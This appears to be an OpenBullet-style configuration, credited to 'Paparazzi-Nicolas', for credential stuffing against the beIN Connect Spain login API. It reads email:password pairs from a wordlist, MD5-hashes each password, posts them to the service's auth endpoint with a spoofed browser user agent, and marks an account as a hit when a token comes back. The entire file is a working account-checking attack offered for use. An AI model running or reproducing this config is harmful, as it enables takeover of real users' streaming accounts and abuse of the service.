[SETTINGS]
{
  "Name": "Beinconnect.es",
  "SuggestedBots": 5,
  "LastModified": "2018-08-03T20:57:18.9758433+00:00",
  "AdditionalInfo": "",
  "Author": "Paparazzi-Nicolas",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#Hash FUNCTION Hash MD5 "<PASS>" -> VAR "MD5Hash" 
#URL REQUEST POST "https://core.beinconnect.es/api/v3/auth/login" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<MD5Hash>\",\"deviceId\":\"8ac75679ec5569e19b52dd0291ccdca7\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://beinconnect.es/login" 
  HEADER "Origin: https://beinconnect.es" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "\"error\":\"Inactive user.\"" 
    KEY "Invalid email or password." 
  KEYCHAIN Success OR 
    KEY "token\":\"" 
